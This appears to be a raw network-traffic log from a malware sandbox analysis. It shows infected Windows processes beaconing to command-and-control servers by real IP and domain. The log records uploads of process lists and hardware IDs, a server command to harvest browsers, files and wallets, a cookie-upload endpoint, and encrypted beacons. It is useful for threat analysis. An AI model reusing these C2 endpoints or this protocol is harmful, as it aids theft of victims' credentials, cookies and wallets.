Dec 24, 2023 10:45:37.516638041 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCG Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:38.394181013 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:38.403630972 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBGCAFIIECBFIDHIJKFB Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:39.115595102 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:39.124047041 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FBKECFIIEHCFHIECAFBA Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:39.863145113 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:39.976466894 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBKKFCBAKKFBGCBFHJDG Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:40.623390913 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:40.633265018 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHJKJDGCGDAKFHIDBGCB Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:41.422358036 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:41 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:41.433696032 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIIIJJKJKFHIDGDBAKJ Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:42.375896931 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:42.394059896 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJJECFIECBGDGCAAAEH Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:43.589765072 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:43.656444073 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJKFIIIJJKJJKEBGIDGC Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:44.505009890 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:44.513777018 CET	199	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEBFHIJECFIDGDGCGHCG Host: 77.91.76.36 Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:45.124053955 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:45.265435934 CET	201	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EHDGCGIDAKEBKECAFIEH Host: 77.91.76.36 Content-Length: 118379 Connection: Keep-Alive Cache-Control: no-cache
Dec 24, 2023 10:45:46.606477976 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Dec 24, 2023 10:45:46.670279026 CET	462	OUT	POST /3886d2276f6914c4.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGI Host: 77.91.76.36 Content-Length: 264 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 62 35 66 34 35 36 36 64 65 66 66 66 31 39 33 63 66 61 32 31 39 36 65 32 64 33 35 31 61 36 30 63 35 66 63 31 32 37 31 30 34 35 34 30 34 31 63 39 62 32 65 62 62 64 37 34 34 63 39 65 34 33 36 34 62 64 35 39 66 61 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 64 6f 6e 65 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 48 4a 4a 45 48 44 48 43 41 41 4b 46 49 49 44 47 49 2d 2d 0d 0a Data Ascii: ------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="token"1cb5f4566defff193cfa2196e2d351a60c5fc12710454041c9b2ebbd744c9e4364bd59fa------ECGHJJEHDHCAAKFIIDGIContent-Disposition: form-data; name="message"done------ECGHJJEHDHCAAKFIIDGI--
Dec 24, 2023 10:45:47.282263994 CET	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49743	46.246.96.149	80	5340	C:\Users\user\AppData\Local\Temp\16E6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:50.386670113 CET	215	OUT	POST /proccesses HTTP/1.1 Host: 46.246.96.149 User-Agent: httpclientcpp-agent/1.0 Accept: / Content-Length: 19494 Content-Type: multipart/form-data; boundary=------------------------VgaZhXN8ohCuBDUWVzAOjP
Dec 24, 2023 10:44:50.387187004 CET	11574	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 67 61 5a 68 58 4e 38 6f 68 43 75 42 44 55 57 56 7a 41 4f 6a 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 Data Ascii: --------------------------VgaZhXN8ohCuBDUWVzAOjPContent-Disposition: form-data; name="idb"e_user--------------------------VgaZhXN8ohCuBDUWVzAOjPContent-Disposition: form-data; name="hwid"24016a262ebe93762d796917314914c2--------
Dec 24, 2023 10:44:50.649146080 CET	1286	OUT	Data Raw: 5a 6d 74 4a 47 4b 66 55 58 75 49 6e 54 43 67 45 49 6b 73 57 53 53 62 68 74 5c 5a 79 68 4c 58 78 67 56 6d 4a 49 78 63 4a 2e 65 78 65 22 20 0d 0d 0a 49 44 3a 20 33 36 34 38 2c 20 4e 61 6d 65 3a 20 5a 79 68 4c 58 78 67 56 6d 4a 49 78 63 4a 2e 65 78 Data Ascii: ZmtJGKfUXuInTCgEIksWSSbht\ZyhLXxgVmJIxcJ.exe" ID: 3648, Name: ZyhLXxgVmJIxcJ.exe, CommandLine: "C:\Program Files (x86)\EdVaAZMVWcAHePGkBTHuqaPurMSGyZmtJGKfUXuInTCgEIksWSSbht\ZyhLXxgVmJIxcJ.exe" ID: 3168, Name: ZyhLXxgVmJIxcJ.exe, Command
Dec 24, 2023 10:44:50.649451017 CET	6634	OUT	Data Raw: 4a 2e 65 78 65 2c 20 43 6f 6d 6d 61 6e 64 4c 69 6e 65 3a 20 22 43 3a 5c 50 72 6f 67 72 61 6d 20 46 69 6c 65 73 20 28 78 38 36 29 5c 45 64 56 61 41 5a 4d 56 57 63 41 48 65 50 47 6b 42 54 48 75 71 61 50 75 72 4d 53 47 79 5a 6d 74 4a 47 4b 66 55 58 Data Ascii: J.exe, CommandLine: "C:\Program Files (x86)\EdVaAZMVWcAHePGkBTHuqaPurMSGyZmtJGKfUXuInTCgEIksWSSbht\ZyhLXxgVmJIxcJ.exe" ID: 6508, Name: ZyhLXxgVmJIxcJ.exe, CommandLine: "C:\Program Files (x86)\EdVaAZMVWcAHePGkBTHuqaPurMSGyZmtJGKfUXuInTCgEIks
Dec 24, 2023 10:44:51.027987003 CET	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:50 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=0ue0d5knsfoaj6fpu9tjelk4vc; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49744	46.246.96.149	80	5340	C:\Users\user\AppData\Local\Temp\16E6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:51.325906992 CET	174	OUT	POST /getpu HTTP/1.1 Host: 46.246.96.149 User-Agent: httpclientcpp-agent/1.0 Accept: / Content-Type: application/x-www-form-urlencoded Content-Length: 10 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 Data Ascii: idb=e_user
Dec 24, 2023 10:44:51.650122881 CET	456	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:51 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=mopedh1t6f86csinjt3vikptvv; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 32 66 0d 0a 7b 22 70 61 74 68 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 36 2e 32 34 36 2e 39 36 2e 31 34 39 5c 2f 74 65 73 74 64 6f 77 6e 6c 6f 61 64 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f{"path":"http:\/\/46.246.96.149\/testdownload"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49745	46.246.96.149	80	5340	C:\Users\user\AppData\Local\Temp\16E6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:51.912592888 CET	101	OUT	GET /testdownload HTTP/1.1 Host: 46.246.96.149 User-Agent: httpclientcpp-agent/1.0 Accept: /
Dec 24, 2023 10:44:52.244446993 CET	351	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:52 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=ipvpl0jcjon692tm4evhjsuqs9; path=/ Upgrade: h2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49746	46.246.96.149	80	5340	C:\Users\user\AppData\Local\Temp\16E6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:52.511538982 CET	228	OUT	POST /getcommands HTTP/1.1 Host: 46.246.96.149 User-Agent: httpclientcpp-agent/1.0 Accept: / Content-Type: application/x-www-form-urlencoded Content-Length: 58 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 30 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=0
Dec 24, 2023 10:44:52.840893984 CET	497	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:52 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=79ra8695n0fa49pfen04srke83; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 35 38 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 2c 22 63 6f 6d 6d 61 6e 64 22 3a 22 62 72 6f 77 73 65 72 73 7c 66 69 6c 65 73 7c 77 61 6c 6c 65 74 73 22 2c 22 70 61 74 68 73 22 3a 22 44 65 73 6b 74 6f 70 2c 44 6f 63 75 6d 65 6e 74 73 7c 2e 74 78 74 2c 2e 64 6f 63 7c 30 3b 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 58{"msg":true,"command":"browsers\|files\|wallets","paths":"Desktop,Documents\|.txt,.doc\|0;"}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49749	91.215.85.17	80	6480	C:\Windows\SysWOW64\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:53.838665962 CET	285	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://stualialuyastrelia.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 501 Host: stualialuyastrelia.net
Dec 24, 2023 10:44:53.838701010 CET	501	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 34 cc c4 b9 41 dd 0f 7e 01 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 81 9a c6 a4 19 ba 8a 14 62 cd d6 4f 96 86 c1 38 d9 Data Ascii: HOW YU"yT.ken`us6,j4A~;}f=BbO8p&QD{jB+"m]bF4JEBP5XO2a;/TjF-+y\|l3MVMtxsiP^%u8Fd=mU
Dec 24, 2023 10:44:54.128912926 CET	599	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:44:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 74 75 61 6c 69 61 6c 75 79 61 73 74 72 65 6c 69 61 2e 6e 65 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19a<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at stualialuyastrelia.net Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49750	46.246.96.149	80	5340	C:\Users\user\AppData\Local\Temp\16E6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:56.151375055 CET	214	OUT	POST /sendcookies HTTP/1.1 Host: 46.246.96.149 User-Agent: httpclientcpp-agent/1.0 Accept: / Content-Length: 970 Content-Type: multipart/form-data; boundary=------------------------9L5qNiHAByHovnyXxQUDe6
Dec 24, 2023 10:44:56.159183979 CET	970	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 39 4c 35 71 4e 69 48 41 42 79 48 6f 76 6e 79 58 78 51 55 44 65 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 Data Ascii: --------------------------9L5qNiHAByHovnyXxQUDe6Content-Disposition: form-data; name="idb"e_user--------------------------9L5qNiHAByHovnyXxQUDe6Content-Disposition: form-data; name="hwid"24016a262ebe93762d796917314914c2--------
Dec 24, 2023 10:44:56.491602898 CET	351	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:44:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: keep-alive Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=k55klvtu2vti58f5daf9dfoudi; path=/ Upgrade: h2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49751	46.246.96.149	80	5340	C:\Users\user\AppData\Local\Temp\16E6.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:44:59.886728048 CET	228	OUT	POST /getcommands HTTP/1.1 Host: 46.246.96.149 User-Agent: httpclientcpp-agent/1.0 Accept: / Content-Type: application/x-www-form-urlencoded Content-Length: 58 Data Raw: 69 64 62 3d 65 5f 75 73 65 72 26 68 77 69 64 3d 32 34 30 31 36 61 32 36 32 65 62 65 39 33 37 36 32 64 37 39 36 39 31 37 33 31 34 39 31 34 63 32 26 63 6f 6d 6d 61 6e 64 3d 31 Data Ascii: idb=e_user&hwid=24016a262ebe93762d796917314914c2&command=1
Dec 24, 2023 10:45:00.263500929 CET	420	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 24 Dec 2023 09:45:00 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Set-Cookie: PHPSESSID=mv4lmoi8m9ekk7npi2445s58vr; path=/ Upgrade: h2 Vary: Accept-Encoding Data Raw: 63 0d 0a 7b 22 6d 73 67 22 3a 74 72 75 65 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: c{"msg":true}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49756	158.160.130.138	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:45:08.894092083 CET	274	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://delwrkisni.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 193 Host: host-host-file8.com
Dec 24, 2023 10:45:08.894123077 CET	193	OUT	Data Raw: 10 87 f2 e2 6f 85 a5 b7 c3 3d 78 36 7a cb e1 f3 46 63 df 34 d5 37 6e 9d b8 9c db 83 89 ae 97 83 11 c3 59 a4 1f 1c c5 e5 e1 ab f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 35 de 83 7a Data Ascii: o=x6zFc47nYki\wu$f]d5z)z3$L?#%$qu>Z@5_m(<KpG!t+$N,/c]Y+Mwi:9VG=11SV
Dec 24, 2023 10:45:09.185703993 CET	171	IN	HTTP/1.1 200 OK server: nginx/1.20.2 date: Sun, 24 Dec 2023 09:45:09 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked Data Raw: 46 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: FYour IP blocked0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49766	91.215.85.17	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:46:00.239067078 CET	281	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tjsvjuygyxuqax.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 24, 2023 10:46:00.239109993 CET	109	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bONfy&5c50
Dec 24, 2023 10:46:00.528347015 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:46:00 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49770	91.215.85.17	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:46:08.337745905 CET	278	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://adfhhawdqcf.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 24, 2023 10:46:08.337788105 CET	109	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bONfy&5c50
Dec 24, 2023 10:46:08.628073931 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:46:08 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49772	91.215.85.17	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:46:17.652920961 CET	279	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ydiriiwlnypt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
Dec 24, 2023 10:46:17.652934074 CET	109	OUT	Data Raw: 48 9d 89 c9 4f 17 57 20 59 00 55 22 79 aa 54 cb 2e 6b 9e 65 8c 6e ac d8 b3 60 a0 f7 75 fe a7 e5 89 a1 8d b2 73 36 ef c2 aa 2c 6a 75 80 82 f6 0f 8e 22 2e 42 00 86 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 bb 8a 14 62 cc d6 4f 96 f3 f2 4e fd Data Ascii: HOW YU"yT.ken`us6,ju".B;}f=B!bONfy&5c50
Dec 24, 2023 10:46:17.946392059 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Sun, 24 Dec 2023 09:46:17 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49774	158.160.130.138	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:46:21.155541897 CET	269	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vitkv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 315 Host: host-host-file8.com
Dec 24, 2023 10:46:21.155572891 CET	315	OUT	Data Raw: 10 87 f2 e2 6f 85 a5 b7 c3 3d 78 36 7a cb e1 f3 46 63 df 34 d5 37 6e 9d b8 9c db 83 89 ae 97 83 11 c3 59 a4 1f 1c c5 e5 e1 ab f3 d8 d9 95 15 05 6b 98 69 fc e4 ec aa 80 eb 5c bd d7 e1 89 77 d4 75 24 f3 c4 86 de 9e 66 5d 02 c9 a1 c1 64 2c 9a d6 3a Data Ascii: o=x6zFc47nYki\wu$f]d,:N7CqoW]I THp,w/(:qXJxQ^u_{kCA<qYiMmm:"mQm8EWa2"}mWOah[.Can7z
Dec 24, 2023 10:46:21.444156885 CET	171	IN	HTTP/1.1 200 OK server: nginx/1.20.2 date: Sun, 24 Dec 2023 09:46:21 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked Data Raw: 46 0d 0a 59 6f 75 72 20 49 50 20 62 6c 6f 63 6b 65 64 0d 0a 30 0d 0a 0d 0a Data Ascii: FYour IP blocked0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49775	91.215.85.17	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Dec 24, 2023 10:46:27.845005989 CET	281	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rglnvctoidbsbe.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 109 Host: stualialuyastrelia.net
